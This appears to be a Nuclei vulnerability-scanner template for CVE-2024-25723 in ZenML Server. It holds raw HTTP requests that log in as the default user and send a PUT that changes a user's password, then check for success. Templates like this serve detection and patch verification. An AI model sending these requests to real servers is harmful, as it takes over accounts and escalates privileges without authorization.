id: CVE-2024-25723
info:
  name: Zenml Improper Access Control
  author: VulnSphere
  severity: high
  description: "ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. These are also patched versions: 0.44.4, 0.43.1, and 0.42.2."
  reference:
    - https://github.com/zenml-io/zenml
    - https://github.com/zenml-io/zenml/compare/0.42.1...0.42.2
    - https://github.com/zenml-io/zenml/compare/0.43.0...0.43.1
    - https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4
    - https://www.zenml.io/blog/critical-security-update-for-zenml-users
  classification:
    epss-score: 0.00045
    epss-percentile: 0.13033  
  tags: intrusive


http:
  - raw:
    - |
      POST /api/v1/login HTTP/1.1
      Host: {{Hostname}}
      Accept: application/json
      Content-Type: application/x-www-form-urlencoded
      Referer: {{Hostname}}/login?route=%2Fworkspaces%2Fdefault%3F

      password&username=default

    - |
      PUT /api/v1/users/{{randstr}}   HTTP/1.1
      Host: {{Hostname}}
      Content-Type: "application/json;charset=utf-8"
      Source-Context: "dashboard"
      Referer: {{BaseURL}}/settings/organization
      Cookie: zenml-server-7205f7d5-08e1-4829-995b-16d56f6695d9={{token}}

      {"password":"a"}

    extractors:
      - type: kval
        internal: true
        kval:
          - set_cookie #Note that kval extractor does not accept dash (-) as input and must be substituted with underscore (_).


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"permission_denied":false'
          - '"created"'
          - '"updated'
      - type: status
        status:
          - 200
